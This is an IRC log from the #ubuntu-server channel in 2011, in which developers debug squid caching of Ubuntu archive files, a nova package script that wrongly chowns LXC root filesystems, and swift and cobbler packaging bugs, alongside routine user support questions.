<iamfuzztoo> adam_g, we're about to head out here, can you give this a deeper look and give us a fix we can implement tomorrow morning?
<adam_g> iamfuzztoo: can i get access?
<iamfuzztoo> we're about ready to rock-n-roll here and this is going to be a big holdup
<iamfuzztoo> yep, gonna add them to you all
<lifeless> kirkland: specifically, on archive.ubuntu.com that refresh pattern has no effect
<lifeless> http://redbot.org/?uri=http%3A%2F%2Farchive.ubuntu.com%2Fubuntu%2Fdists%2Foneiric%2Fmain%2Fbinary-i386%2FPackages.gz
<lifeless> kirkland: note: Cache-Control: max-age=0, s-maxage=3300, proxy-revalidate
<lifeless>     Expires: Tue, 27 Sep 2011 22:07:05 GMT
<kirkland> lifeless: hmm, so if I absolutely don't want those cached, I would use "0  0%  0" ?
<lifeless> kirkland: it will check for new Packages.gz's on every request hitting squid
<lifeless> kirkland: well, you should decide what you want to achieve :)
<lifeless> kirkland: why don't you want them cached ?
<kirkland> lifeless: let me get you the error
<kirkland> lifeless: basically we're doing network installs of Ubuntu Oneiric
<lifeless> sure
<kirkland> lifeless: we're trying to use squid for a local cache of the "bulk" of the data
<kirkland> lifeless: several times a day, when trying to network install Oneiric (which is changing pretty rapidly)
<kirkland> lifeless: we end up with a debian-installer error
<kirkland> lifeless: let me get you that error, specifically
<kirkland> lifeless: in any case, we can force-fix the error by clearing the squid cache
<lifeless> so, right now the cache headers sent *by the server* will overwrite your config
<lifeless> *and* they explicitly permit caching for 55 minutes
<lifeless> with a backend-check by the proxy
<kirkland> lifeless: Sep 27 20:51:50 karkalla net-retriever: error: MD5 mismatch for main/debian-installer/binary-amd64/Packages.gz (ed82dd354a0e2002d52db933bce8a4fb != a103daf54ebee145e109d9107d709988).
<lifeless> so, debian-installer needs to do a max-age=0 request for both the signature and the packages file when that happens
<lifeless> there is an apt bug for this
<lifeless> its *not* because you have a cache.
<lifeless> the cache exacerbates it.
<lifeless> but doesn't cause
<iamfuzztoo> adam_g,   1: {dns-name: ec2-107-20-92-155.compute-1.amazonaws.com, instance-id: i-38b8d758}
<iamfuzztoo>   2: {dns-name: ec2-50-16-71-162.compute-1.amazonaws.com, instance-id: i-00b8d760}
<iamfuzztoo>   3: {dns-name: ec2-107-20-68-128.compute-1.amazonaws.com, instance-id: i-d2b1deb2}
<iamfuzztoo>   4: {dns-name: ec2-50-19-154-152.compute-1.amazonaws.com, instance-id: i-4eb0df2e}
<iamfuzztoo>   5: {dns-name: ec2-107-20-0-58.compute-1.amazonaws.com, instance-id: i-7e8ae51e}
<iamfuzztoo>   6: {dns-name: ec2-107-20-114-131.compute-1.amazonaws.com, instance-id: i-4c8ae52c}
<iamfuzztoo> adam_g, should be able to access all of those now
<adam_g> iamfuzztoo: you're running swift 1.4.4~20110927.1585-0ubuntu0ppa1~oneiric1
<adam_g> which is trunk
<iamfuzztoo> adam_g, looks like we missed one reference
<iamfuzztoo> adam_g, will try again
<lifeless> kirkland: thats because there is a race condition updating the archive [very small but it exists], and the cache is multiplying that out to a 55 minute race condition
<lifeless> kirkland: this file - http://archive.ubuntu.com/ubuntu/dists/oneiric/Release
<adam_g> iamfuzztoo: looks like they were all configured to install from trunk
<lifeless> kirkland: is the one that has to be kept in sync
<adam_g> im testing this on m1.large as wel right now to confirm thats the issue
<iamfuzztoo> adam_g, cool, redoing here as well
<lifeless> kirkland: https://bugs.launchpad.net/ubuntu/+source/apt/+bug/33505
<uvirtbot> Launchpad bug 33505 in apt "BADSIG errors using transparent http proxies" [High,Fix released]
<lifeless> kirkland: no idea why its marked fix released, because its the same issue
<lifeless> kirkland: ah bug https://bugs.launchpad.net/ubuntu/+source/update-manager/+bug/24061
<uvirtbot> Launchpad bug 24061 in update-manager "GPG error with apt-get/aptitude/update-manager behind proxy (BADSIG 40976EAF437D05B5)" [Low,Won't fix]
<kirkland> lifeless: okay, so if i can reduce that down to 0, that would bring it back to the same, original race condition
<kirkland> lifeless: which is approximately what I was trying to do
<lifeless> ok, so for that you need
<lifeless> min 0
<lifeless> percent 0
<lifeless> max 0
<lifeless> refresh-ims
<lifeless> override-expire
<elmo> what's the refresh-ims thing?  I can't see reference to it in the squid source
<lifeless>                 refresh-ims causes squid to contact the origin server
<lifeless>                 when a client issues an If-Modified-Since request. This
<lifeless>                 ensures that the client will receive an updated version
<lifeless>                 if one is available.
<lifeless> may be 3.2 only
<lifeless> I'm not sure it will be sufficient though, because our servers *are* sending solid headers telling clients what to do
<lifeless> and squid is really geared to listen to them
<elmo> lifeless: sorry, I'm missing context, are you saying the headers are a bad idea?
<lifeless> elmo: no, not at all
<lifeless> elmo: have you see redbot ?
<lifeless> http://redbot.org/?uri=http%3A%2F%2Farchive.ubuntu.com%2Fubuntu%2Fdists%2Foneiric%2FRelease
<lifeless> elmo: our current headers permit 55 minutes of fresh time
<lifeless> elmo: during that time the files can be served without doing an IMS
<lifeless> elmo: this is only permitted for shared caches (like squid). end clients are told to do an IMS every time.
<lifeless> elmo: its always going to be a tradeoff between some clients getting inconsistent release + packages files, or our servers getting an IMS for every single client doing an install.
<lifeless> elmo: at least until we fix the clients to properly handle this
<elmo> I'm totally fine with them getting an IMS
<elmo> but i'd like to fix apt
<elmo> and net-retriever
<lifeless> totally
<elmo> to do some sort of controlled retry on a hash sum mismatch
<lifeless> right, mvo was telling me a year or so back he was doing that
<lifeless> I don't know where its up to
<elmo> oh, so
<elmo> it's interesting
<elmo> we're using 3300
<lifeless> anyhow, to ensure we get an IMS, we can either set the expires lower (e.g. to 'now') or the s-maxage down to 0
<elmo> but our cron.daily interval is back down to 30m
<elmo> I wonder if that's part of the problem
<lifeless> 'age' applies to since retrieval, not since creation.
<lifeless> ^- this is a key bit.
<uvirtbot> lifeless: Error: "-" is not a valid command.
<lifeless> section 1.3 '   age
<lifeless>       The age of a response is the time since it was sent by, or
<lifeless>       successfully validated with, the origin server.
<lifeless> '
<lifeless> the implication is that a request 1 second before a mirror pulse is only valid, from our perspective, for an age of 1 second
<iamfuzztoo> adam_g, changed them all to distro, and now the swift wasn't installed at all on the machines ;-)
<lifeless> elmo: I think we want two things: expires set to just before the next mirror pulse, and s-maxage set to 0
<elmo> lifeless: I think we should drop it down to 'now' on archive.u.c
<lifeless> elmo: expires set to $now is fine too.
<lifeless> elmo: less tricky to make happen
<adam_g> iamfuzztoo: im at a loss dude, i just redeployed it all with m1.large and its working as expected
<adam_g> iamfuzztoo: where are the instances?
<iamfuzztoo> adam_g, https://pastebin.canonical.com/53492/
<iamfuzztoo> https://pastebin.canonical.com/53493/
<cjwatson> Daviey: cobbler-enlist> not following you - if what preseeded question contains an escaped string?
<adam_g> iamfuzztoo: juju status | pastebinit ?
<cjwatson> Daviey: oh.  you should totally be quoting properly there
<cjwatson> Daviey: http://paste.ubuntu.com/698168/
<adam_g> iamfuzztoo: oh!
<adam_g> iamfuzztoo: update your charms, from lp:charm/swift-storage + lp:charm/swift-storage
<cjwatson> elmo: our cron.daily interval is still 60m, but there's a mirror sync near the start (security) and near the end (everything else) of that
<adam_g> iamfuzztoo: lp:charm/swift-proxy, that is
<elmo> cjwatson: oh - ok
<iamfuzztoo> adam_g, I'll try that tomorrow and get back with you.  In the meantime, here's what went wrong this time: https://pastebin.canonical.com/53494/
<iamfuzztoo> package never got installed.  Ran the install script manually again and it installs
<iamfuzztoo> juju is magical...
<iamfuzztoo> I'll update tomorrow, rinse and repeat, and hope we get somewhere
<iamfuzztoo> adam_g, thanks for the help!
<elmo> lifeless: http://paste.ubuntu.com/698173/
<elmo> lifeless: look sane?
<adam_g> iamfuzztoo: there was a bug in the charm that i fixed when installing from the archive, which i commited yesterday and is seperate from the issue you were having earlier
<adam_g> doh
<Daviey> utlemming: Do we really need wpa_* tools in cloud images? :)
<lifeless> elmo: +1
<uvirtbot> New bug: #861020 in libaio (main) "package libaio-dev (not installed) failed to install/upgrade: trying to overwrite '/usr/include/libaio.h', which is also in package libaio:i386 0.3.104-1" [Undecided,New] https://launchpad.net/bugs/861020
<smoser> Daviey, those get pulled in by linux-virtual i think..
<smoser> some dependency
<smoser> they're definitely not explicitly requested.
#ubuntu-server 2011-09-28
<Daviey> smoser: it's seeded in server
<Daviey> blame Keybuk.
<SpamapS> not Canada?
<zul> SpamapS: too easy to
<adam_g> zul:  ping
<zul> adam_g: what up?
<adam_g> zul: https://bugs.launchpad.net/swift/+bug/836922 thoughts on cherrypicking this? it will make maintaining a single charm to deploy different swift versions a bit easier. https://bugs.launchpad.net/swift/+bug/836922
<uvirtbot> Launchpad bug 836922 in swift "swift-ring-builder exit status confusing" [Undecided,Fix committed]
<zul> adam_g: i dont have a problem with it
<adam_g> zul: ok. ill look to see if the charm can be modified to be compat with both sets of return codes first.
<zul> adam_g: i can probably pull it in tomorrow though
<zul> im about to go off line
<adam_g> zul: ok, dont worry about it for now i guess. ill let you know. cya
<Daviey> RoAkSoAx: did you have a chance to investigate bug 827496?
<uvirtbot> Launchpad bug 827496 in cobbler "cobbler kickstart metadata dont affect ubuntu preseed " [High,Incomplete] https://launchpad.net/bugs/827496
<RoAkSoAx> Daviey my tests they dobaffect so.i would probably mark.that bug invalid but i need to test a bit more cause we use kickstar meta data in.daily basis without issues
<ziesemer> Anyone have any quick suggestions for finding the endpoints using the most traffic on an Ubuntu server being used as a SOHO router?  I like the look of iftop, but it only seems to be able to listen on one interface - and as such, always shows the interface as one of the endpoints.
<ruben23> hi guys anyone made a successfull install of eaccelerator for php on ubuntu server 10.04 LTS
<Gasseus> Umm... I'm having difficulty getting apache to execute my php files...
<twb> That's a feature.
<Gasseus> Its pushing the php files as a download instead of running them.
<malakhi> Gasseus: is mod_php activated?
<Gasseus> malakhi yep
<malakhi> Gasseus: make sure that Apache is using the right MIME type for php, and that the Apache config for the site that you're setting up allows php scripts to run.
<Daviey> Gasseus: Can you try clearing your browser cache, i've seen it happen that people get that before installing  / enabling php, then the .php file is cached by the browser.
<Daviey> Failing that, have you turned it off and on again? :)
<ikonia> Daviey: think I may have almost got the docecot bug fixed, can't do anything with it for a few hours due to being on a clients site, but I should have a more realistic update later today
<ikonia> dovecot
<Daviey> ikonia: awesome!
<Peetz0r> Hi, I use sslh to run ssh and https over port 443. Connecting to ssh over 443 takes way longer than over port 22. Can this be fixed, and how?
<jamespage> morning all
<uvirtbot> New bug: #861260 in nova (main) "nova-common upgrade fails with runing lxc instances" [Undecided,New] https://launchpad.net/bugs/861260
<rbasak> jamespage: surely the bug is that root is mounted read-only?
<jamespage> rbasak, hmm - not so sure
 * rbasak fires up his panda
<jamespage> that might be something todo with how libvirt/nova/lxc work together
 * jamespage admits he's not expert
<Daviey> jamespage: please don't tarnish your brand.
<Daviey> jamespage: so that bug seems to be because of:
<Daviey> -    chown -R nova:root /var/lib/nova/ /var/log/nova/ /etc/nova/nova.conf
<Daviey> +    chown -R nova:nova /var/lib/nova/ /var/log/nova/ /etc/nova/nova.conf
<jamespage> agreed - that landed last night
<Daviey> Yeah, not sure why that doesn't work
<jamespage> it needs to accomodate running lxc filesystems
<jamespage> and exclude them
<rbasak> So your root filesystem is definitely mounted rw?
<jamespage> just trying to figure that out now
<rbasak> I see /dev/sda1 /boot ext2 rw,relatime,errors=continue 0 0 in my cobbler-installed /proc/mounts
<Daviey> hmm, is it enough to just || true ?
<jamespage> http://paste.ubuntu.com/698389/
<jamespage> rootfs is owned by root
<jamespage> and should probably stay that way
<jamespage> hmm - not sure that postinst works that well on upgrades
<jamespage> it does not change the default group for nova -> nova
<jamespage> so files still get created with nogroup and group owner
<jamespage> hmm - I just ran that chmod once I fixed the upgrade
<jamespage> it just changed all of the permissions in my rootfs as well
<jamespage> yikes
<rbasak> OK I'm lost now, I'm not sure I understand the problem
<jamespage> rbasak, hmm - that is odd
<jamespage> I don't think the issue was that my root filesystem was read-only
<jamespage> I just downloaded and unpacked a load of packages
<rbasak> Could an error have caused it to go read-only?
<rbasak> dmesg?
<jamespage> rbasak, well its still read write - I've not rebooted
<rbasak> Can you write to it?
<jamespage> /dev/mapper/winehouse-root on / type ext4 (rw,errors=remount-ro)
<jamespage> yes
<rbasak> OK, I'm lost then :)
<jamespage> once completed the nova upgrade manually spun up another lxc instance just fine
<jamespage> rbasak, OK - so it looks like on the of qemu-nbd mounted filesystems went read-only
<jamespage> I can see that in the syslog from around 0600 this morning
<jamespage> which caused the upgrade to bork
<Daviey> jamespage: ah, could be a remount=ro issue?
<Daviey> sdhc card errored?
<jamespage> Daviey: yes
<jamespage> running off SATA USB disk
<jamespage> and only one of three that where mounted so odd
<jamespage> the postinst is still *wrong* tho - it should not change the permissions in the filesystem mount on rootfs
<jamespage> thats within the lxc instance
<jamespage> gah - now nova-compute is borked an won't start
<Daviey> eek
<Daviey> jamespage: yeah, so lxc needs special-casing. Nice.
<jamespage> yep
<jamespage> bug report updated
<jamespage> thanks for going ro filesystem - I would not have spotted that otherwise
<jamespage> Daviey: is 'find' allowed in maintainer scripts?
<jamespage> that would make it easy
<Daviey> jamespage: there is history of it.
<Daviey> jamespage: see gconf package, for example
<vagy> hi
<vagy> i've a question: i connect via ssh on a 10.04 system ... is it possible to monitor whatever messages the kernel or daemons generate by monitoring some tty device?
<TeTeT> vagy: you would need to change (r)syslogs configuration
<TeTeT> vagy: man rsyslog.conf might contain some useful information for your undertaking
<TeTeT> vagy: in general I think an easier approach is to use byobu on the server and simply tail -f the relevant log files
<vagy> TeTeT: thanx...at the moment i try to debug starting/stopping vmware vms, so i need to see whatever messages are produced by the daemons involved
<TeTeT> vagy: maybe it's in /var/log/daemon.log
<vagy> TeTeT: didn't know about byobu, i'll check it out
<TeTeT> vagy: it's an enhancement for screen, if you're familiar with that tool - multiple consoles in one text window
<PleXs> how can i change my keyb layout?
<TeTeT> PleXs: I'd try sudo dpkg-reconfigure console-setup if you have no GUI
<PleXs> I don't get the option to change keyboard layout there
<PleXs> TeTeT, it only changes te looks of the console
<TeTeT> PleXs: hmm, what Ubuntu version are you using? On Lucid the first screen I get for console-setup asks for the keyboard model
<PleXs> TeTeT, latest version 11.04
<TeTeT> PleXs: I don't have 11.04 running right now, but google pointed me to: http://igrudge.net/keyboard-layout-ubuntu-server-11-04/
<PleXs> TeTeT, lol now it can't find the symbols :)
<PleXs> never mind reinstall with the right keyboard :)
<PleXs> isn't ssh standard installed with ubuntu server ?
<qman__> PleXs, no
<qman__> by default, ubuntu server has no listening services
<hallyn> adam_g: bug 833891 for me is fixed with the posted debdiffs.  you had seen that bug too right?
<uvirtbot> Launchpad bug 833891 in udev "lvscan often times out during boot" [High,Confirmed] https://launchpad.net/bugs/833891
<smoser> hallyn, thats great digging
<Daviey> hallyn: +  if (daemonize)
<Daviey> +	  exit(0);
<Daviey> Is that right?
<lynxman> morning everyone o/
<RoAkSoAx> Daviey: bug #827496 is really invalid
<uvirtbot> Launchpad bug 827496 in cobbler "cobbler kickstart metadata dont affect ubuntu preseed " [High,Incomplete] https://launchpad.net/bugs/827496
<smoser> hallyn, and i'm confused.
<smoser> just looing at your patch, i dont see how / where it does a daemonize.
<RoAkSoAx> Daviey: as I always said/thought it was xD
<smoser> oh. i see, it forks always.
<Daviey> RoAkSoAx: awesome :)
<smoser> jamespage, i commented on mp at https://code.launchpad.net/~james-page/nova/fix-lxc-and-primary-group/+merge/77308
<jamespage> smoser: looking
<jamespage> smoser: nice feedback - agree and amending now
<smoser> thank you for testing, jamespage to find this.
<rbasak> Who was working on live migrations on nova?
<RoAkSoAx> jamespage: could you point me again to the pastebins you had for the arm provisiioning?
<RoAkSoAx> jamespage: the preseed and your script to partition the sd card
<jamespage> RoAkSoAx, http://pad.ubuntu.com/arm-server-netboot
<RoAkSoAx> jamespage: cool thanks
<jamespage> RoAkSoAx, np - any questions give me a shout
<jamespage> smoser: updated and pushed
<smoser> jamespage, looks like you mixed space and tab
<smoser> :-(
 * jamespage shouts loundly at himself
<jamespage> or even loudly
<smoser> that is pretty awesome failure though.
<hallyn> Daviey: yes, it has already forked and the child will continue with its exec of vgscan
<smoser> chowning a root filesystem to ownership of a uid:gid not likely even *in* the chroot.
<jamespage> \o/
<jamespage> I enjoyed it!
<Daviey> hallyn: ah! :)
<jamespage> smoser: updated without tabs
<smoser> jamespage, ok.
<smoser> one other thing
<smoser> i just verified what i had thought
<hallyn> Daviey: back in about 30 mins
<smoser> i'm looking at marula
<Daviey> hallyn: have fun!
<smoser> find /var/lib/nova/ \! -user nova
<smoser> shows that some files are owned by libvirt-qemu and 'kvm' group
<smoser> i had thought that libvirt did that, but other files down that directory are owned by nova
<smoser> (perhaps the libvirt-qemu owned ones are the new ones)
<Daviey> smoser: nova-compute does chown some files.
<smoser> right. thats what we're looking at...
<smoser> on install
<smoser> https://code.launchpad.net/~james-page/nova/fix-lxc-and-primary-group/+merge/77308
<smoser> take a look at marula if you want.
<lynxman> jamespage: don't shout at yourself, you're too nice for that
<smoser> i'd like to understand what the "correct" permission for those files is
<smoser> my experience is that files created by libvirt are owned by libvirt and then on destroy it puts ownership back
<smoser> libvirtd runs as root, so in any battle over ownership, it can do what it wants.
<smoser> but i dont know that we should just go changing it.
<smoser> on an upgrade.
<smoser> jamespage, ^
<jamespage> smoser: hmmm
<jamespage> probably not
<smoser> i'm pretty sure we need to not chown . at very least its rude to libvirtd.
<smoser> i'm not sure why that chown is thre.
<smoser> soren, ^ it seems you at least brought 'chown -R' forward from maverick
<jamespage> I think those permissions would be good for lxc instances (looking at what running a new one does)
<jamespage> but prob not kvm
<smoser> so why are we changing on upgrade?
<smoser> i can moderately understand the fresh install case, where there was stuff there for one reason or another from before.
<smoser> maybe it makes sense to only do that on first install and not on subsequent.
<smoser> other than the case that we're fixing 'nogroup' and we can specially fix that.
<jamespage> smoser: interestingly it used to set a root group ownership
<smoser> yeah.
<smoser> i'm sorry i made a mess of this jamespage
<smoser> it started out so easy
<smoser> but i really dont know why we'd do that on upgrade.
<smoser> it can really only break things.
<jamespage> I was working on the 'someone who has more knowledge of why this is done' had implemented that prior to lxc
<smoser> yeah.
<jamespage> and we just needed to tweak to exclude the rootfs firs
<jamespage> dirs
<smoser> which make sense.
<smoser> but i think now, it is "someone did this, and nothing bad blew up"
<jamespage> yes - but I will admit it is a little blind
<jamespage> smoser: might just be that
<smoser> jamespage, can you confirm this, and i'll open a bug:
<smoser>  * apt-get install nova-compute-lxc
<smoser>  * sudo apt-get dist-upgrade
<smoser>  * be told your nova.conf has changed
<smoser> your upgrade log indicates that.
<jamespage> smoser: thats because I'm running over two nodes - so I have changed the nova.conf
<jamespage> one half on a panda and the other on a laptop
<jamespage> panda can't run its all
<smoser> hm.. i thought that nova-compute-lxc did it
<jamespage> I've not seen that
<smoser> ok. it seems sane. i had thought that nova-compute-lxc was modifying on install. but it just lays down its own nova-compute.conf
<jamespage> that sounds right
<smoser> so what do you think to do here?
<smoser> i feel apt to just avoid chowning 'rootfs' like is currently in your mp
<smoser> and maybe i'll open a bug saying we shouldn't chown everything on upgrade
<jamespage> hmm - so assuming that we take the 'its not blown up so-far approach'
<jamespage> i'm nervous that we have switched from nova:root -> nova:nova for the permissions change
<jamespage> smoser: looking at the version history of that file it switch from nova:nogroup to nova:root
<smoser> and back again i think
<smoser> :)
<jamespage> and now we are switching to nova:nova
<jamespage> smoser: not sure about the switch back - looks like that was done for the 'nogroup' security reason
<jamespage> so actually switching to nova:nova makes sense
<smoser> yeah, you're right. i dont know why i thoguth it changed back at the moment.
<smoser> so then potentially fix things that are owned by root or nogroup
<jamespage> so excluding the rootfs directories as in the MP is the minimal change ATM
<smoser> i think i'm kind of up for th eminimal change at this point.
<jamespage> and switching the primary group to nova closes the last bit of the security fix for nogroup
<jamespage> +1 on that
<smoser> right.
<smoser> i think it make sense to go to nova group
<smoser> for things that *were* root
<smoser> or were nogroup
<jamespage> it is a little blanket ATM
<smoser> lets just go with minimal fix.
<smoser> the other small concern i have is that 'find' taking ages
<smoser> ie, if /var/lib/nova had 100,000s of files
<smoser> but i dont think it should really.
<jamespage> I think that is an outside case
<jamespage> in the event that you have that many files in that directory
<jamespage> you are going to be running a monster machine
<jamespage> which should have good io - or else you are a flump
<uvirtbot> New bug: #858875 in cobbler (universe) "a some what odd configuration in cobbler.wsgi" [Undecided,New] https://launchpad.net/bugs/858875
<uvirtbot> New bug: #858883 in cobbler (universe) ""Management Parameters" (for example a system) which can be set in the web interface can result in arbitrary code execution on the host due to the use of yaml.loads instead of yaml.safe_loads in item.py on line 248: " [Undecided,New] https://launchpad.net/bugs/858883
<uvirtbot> New bug: #858878 in cobbler (universe) "lack of csrf protection in cobbler-web" [Undecided,New] https://launchpad.net/bugs/858878
<jamespage> someones busy with cobbler :-)
<uvirtbot> New bug: #861459 in nova (main) "/etc/nova/nova-compute.conf not owned by nova" [Low,Confirmed] https://launchpad.net/bugs/861459
<smoser> jamespage, ok...
<smoser> so i'm almost certain that this is going to cause issue if libvirt closes the filehandles that have been chowned
<smoser> i dont know what case it will occur in, as i tihnk on libvirt restart it wuld probably re-chown the files to libvirt ownership, and otherwise, it probably wont close its file handles
<smoser> but if it does, its not going to be able to write the files that we chown'd to root:root
<smoser> er... to nova:nova
<smoser> jdstrand, around ?
<jdstrand> yep
<smoser> i'm looking at a case in nova, where we have some libvirt instances up, and then a nova upgrade will come through and do
<smoser>  chown -R /var/lib/nova/ , which will include some files that are libvirt:kvm owned
<smoser> libvirt-qemu:kvm
<jdstrand> ok
<smoser> is that going to cause a problem ?
<jdstrand> otoh, it shouldn't as the perms aren't going to be rechecked since kvm already has the open fds
<smoser> so far nothign has flown up in our faces, so i assume that libvirt is just fixing ownership on restart and not closing file handles otherwise (so the perms change dont take affect)
<smoser> right.
<smoser> so when *would* libvirt not fix these things and us get screwed
<jdstrand> libvirt will readjust the perms on stop/start of the guest, yes
<smoser> ok...
<jamespage> smoser: still feels like that chown should be restricted
<jdstrand> on guest reboot, qemu doesn't close the fd, so still should be fine
<smoser> jamespage, yeah, but then i'm afraid
<jdstrand> it is a bit clumsy the way nova is doing that
<smoser> as i'm afraid that nova is going to for some reason need ownership for some reason
<smoser> (live migration, instance terminate... something)
 * smoser adds another 'for some reason' to make sure everyone knows he is sure of nothing
<jdstrand> why not jsut do chown /var/lib/nova/, and then chwon -R on the subdirectories, excepting the one that hold instances
<jdstrand> s/instances/image files/
<smoser> well, 2 reasons... 1, there are files in there that have 'nogroup' or 'root' group that we want to fix.
<smoser> and 2, we're not really sure why this code is there, and we're afraid of breaking things
<jdstrand> I'm saying, do your chown, just be selective
<smoser> right
<jdstrand> you'd have to enumerate what to chown of course, and it would be a bit more brittle
<jdstrand> or you could use find creatively and skip stuff that is -group kvm and -user libvirt-qemu
<uvirtbot> New bug: #858860 in cobbler (universe) "weak default configured permissions on /etc/cobbler/users.digest" [Undecided,New] https://launchpad.net/bugs/858860
<uvirtbot> New bug: #858867 in cobbler (universe) "XMLRPC  allows unauthed users access to various methods (which it shouldn't) " [Undecided,New] https://launchpad.net/bugs/858867
<jdstrand> be careful with find though-- you don't want to follow symlinks and do stuff outside of /var/lib/nova
<zul> morning
<smoser> jdstrand, yeah.
<zul> so chown -R the rootfs in lxc blows up?
<jamespage> zul: kinda
<zul> thats an unintentional effect
<jamespage> it was nice to see everything owned by nova:nova in the lxc instance tho
<zul> hehe
<lynxman> jamespage: lol
 * jamespage sighs
<jamespage> likewise-open - remind me never to volunteer to look at a bug for Daviey again...
<smoser> zul,  you should go ahead and pull jamespage's merge i think.
<smoser> er... maybe not.
<smoser> maybe we should prune off 'instances'
<zul> jamespage: yeah i learned that pretty quick as well ;)
<zul> smoser: does qemu/kvm have the same problem?
<smoser> shoot
<smoser> well, sort of
<smoser> info on the above
<smoser> in the above
<smoser> we change the files, which is bad, but libvirt fixes them for us on restart.
<uvirtbot> New bug: #861504 in nova "nova-compute-lxc limited by available nbd devices to 16" [Undecided,New] https://launchpad.net/bugs/861504
<Daviey> jamespage: what is making you said about it?
<jamespage> Daviey: install on natty just fine - upgraded to oneiric and it borkes pretty bad
<Daviey> jamespage: feel free to bounce it back to me.
<zul> smoser: nbd.ko  defaults to 16 for the max number of block devices
<Daviey> jamespage: gah, dammit
<jamespage> Daviey: well I was able to confirm bug 854971
<uvirtbot> Launchpad bug 854971 in likewise-open "likewise-open package missing libnpfs" [High,Confirmed] https://launchpad.net/bugs/854971
<smoser> yes, i knew that.
<smoser> thats why i said we need to bump it.
<zul> smoser: is there a way we can check to see what the nbds_max is set to and make the changes dynamically in nova?
<smoser> zul, i sort of suggested that.
<smoser> theres really no point in the flag
<smoser> just check all the devices
<zul> smoser: agreed
<zul> smoser: like just get the information from /sys/module/nbd/paramaters/nbds_max
<smoser> right.
<smoser> oh. it is there?
<smoser> yeah, so thats nice.
<zul> its staring at me right now
<smoser> but even then, why bother?
<smoser> it already looks through /sys/block/%s/pid
<zul> well what if you reload the module....yeah right
<smoser> just do that.
<uvirtbot> New bug: #861521 in samba (main) "package samba (not installed) failed to install/upgrade: el subproceso instalado el script post-installation devolviÃ³ el cÃ³digo de salida de error 1" [Undecided,New] https://launchpad.net/bugs/861521
<dori922> hey! I have a shell script thats works fine(adds users from a mysql database) untill i try to run it off a cron job :( via: "$ sudo crontab -u root -e" then:Â "5 * * * * /home/trofnan4/addclients.sh"
<dori922> it woirks outside the cron so im not sure i have cron set up correctly :s
<uvirtbot> New bug: #861547 in nova (main) "/usr/sbin/ietadm is missing in /etc/sudoers.d/nova_sudoers" [Undecided,New] https://launchpad.net/bugs/861547
<jamespage> Daviey: hmmm - trouble at mill - bug 845477
<uvirtbot> Launchpad bug 845477 in likewise-open "/usr/libexec/likewise-open/init-base.sh: 1: [init]: not found" [Undecided,Confirmed] https://launchpad.net/bugs/845477
<Daviey> oh golly.
<jamespage> I'm trying a local build without V=1 to see what difference it makes
<jamespage> Daviey: how important is it that likewise-open remains in the archive?
<Daviey> jamespage: Honestly, not quite sure - i think it is, based on the fact there is bug feedback for Oneiric already
<Daviey> m_3: Hey, you are a ruby fan - right? :)
<m_3> Daviey: yup
<m_3> ssup?
<m_3> dang, did I just volunteer for a bug?
<Daviey> m_3: Well... rails in oneiric is poorly, and i might need your guidance how to resolve.
<m_3> are there specific bugs?
<Daviey> m_3: bug 861524 .. does it really need to be that coupled to versions?
<uvirtbot> Launchpad bug 861524 in rails "[oneiric] rails is not installable" [Critical,Confirmed] https://launchpad.net/bugs/861524
<skrite> hey all, i have a simple dovcot and postfix mail server, working fine with Maildir but now i need a user to be abel to send mail from his laptop, how do i configure so he can use his user account to send mail?
<m_3> Daviey: I can look now
<Daviey> m_3: \o/
 * robbiew takes a break from the USB key sweatshop...bbiab
<Daviey> m_3: So the issue seems to be that some parts are using 2.3.11 and others 2.3.14.
<medberry> SpamapS, is bug 523484 still open
<uvirtbot> Launchpad bug 523484 in ureadahead "ureadahead requires /var on root filesystem" [Medium,Triaged] https://launchpad.net/bugs/523484
<medberry> (for say Natty)
<Daviey> m_3: It's breaking at versioned depends, rather than code problems.  It's not clear to me what ois the best solution.
<Daviey> m_3: bring them all to 2.3.14, or remove the versioned depends?
<SpamapS> medberry: I don't know anything about that bug. :-/
<SpamapS> medberry: if I did before, its been swapped out for other things :P
<medberry> nod. thanks.
<medberry> zul, ^ 523484
<zul> medberry:  ah
<Daviey> medberry: Have you encountered it?
<medberry> Daviey, yes, sort of...
<Daviey> medberry: If so, does removing ureadahead resolve the issue?
<medberry> checking.
<negronjl> SpamapS: ping
<SpamapS> negronjl: pong, sup?
<negronjl> SpamapS, having issues with the mysql charm.  Need MySQL expertise
<negronjl> I am trying to create a mysql table with foreign keys and I get errno:150.  any thoughts?
<SpamapS> negronjl: MyISAM?$ perror 150
<negronjl> the mysql charm is being configured with aug and I don't quite get aug enough to do anything useful with it.
<SpamapS> MySQL error code 150: Foreign key constraint is incorrectly formed
<negronjl> tables are not MyISAM, they are InnoDB.
<negronjl> SpamapS, also, when i install the same verison of mysql vi apt-get, it all works.
<SpamapS> negronjl: very strange
<negronjl> SpamapS, the issue is that the charm is already being used in other parts of nova and would just like to fix the charm ( I am pretty sure is something that aug is doing )
<SpamapS> negronjl: well I don't know what that error message means well enough to debug it..
<negronjl> SpamapS, ahh..ok.  Know of any MySQL guru's ?
<SpamapS> negronjl: we don't change much in my.cnf ...
<SpamapS> negronjl: I'm sure I could help, but don't have any time to dig into it right now. :-/
<negronjl> SpamapS, thanks anyway.  I'll work it out somehow ( I hope ) :)
<SpamapS> negronjl: google that error message.. I think its probably something simple.
<SpamapS> negronjl: the settings we changed in my.cnf really shouldn't have any bearing.. :p
<negronjl> SpamapS, will do.  thx
<lynxman> SpamapS: actually they did, we found the issue :)
<lynxman> SpamapS: InnoDB engine won't do a foreign key relation between two fields that have different type, this case was varchar relating to int
<bau_> hi all i have a problem with my ubuntu server: i can't see samba shares but i can ssh it and smb://ip-address to it, why?
<skrite> how do i troubleshoot not being able to log into my email server from a client like thunderbird. i can connect to the dovecot receiving but not the postfix smtp from outside
<pyro_killer> anyone in today?
<koolhead17> hi all
<pyro_killer> my ubuntu server will only upload 20-30kBps, wich is not enoug for my use
<pyro_killer> ive tried niceing it, reniceing it, and the ww-data user, seen through apaches config files, and it isnt runing anything else atm
<pyro_killer> the speeds ive gotten on torrents on it have been up to 9 MBps
<Pici> pyro_killer: Stupid question, but your torrents aren't seeding when you're trying to download things from your server, right?
<pyro_killer> Pici: no, i've killed it, ive had this problem for some time
<pyro_killer> Pici: but it seems that after a certain amount of installations, for compilers, mods for apache and such, it hits, and gets capped
<JanC> pyro_killer: it's only with apache that you have the problem?
<pyro_killer> also the ......
<pyro_killer> vsftp
<Pici> pyro_killer: Is it purely a bandwidth issue, or are you seeing problems with apache cpu usage that might be causing a bottleneck?
<pyro_killer> no, there is no bottleneck, only running mysql and  apache
<jamespage> Daviey: I've marked bug 854971 as server-o-rs
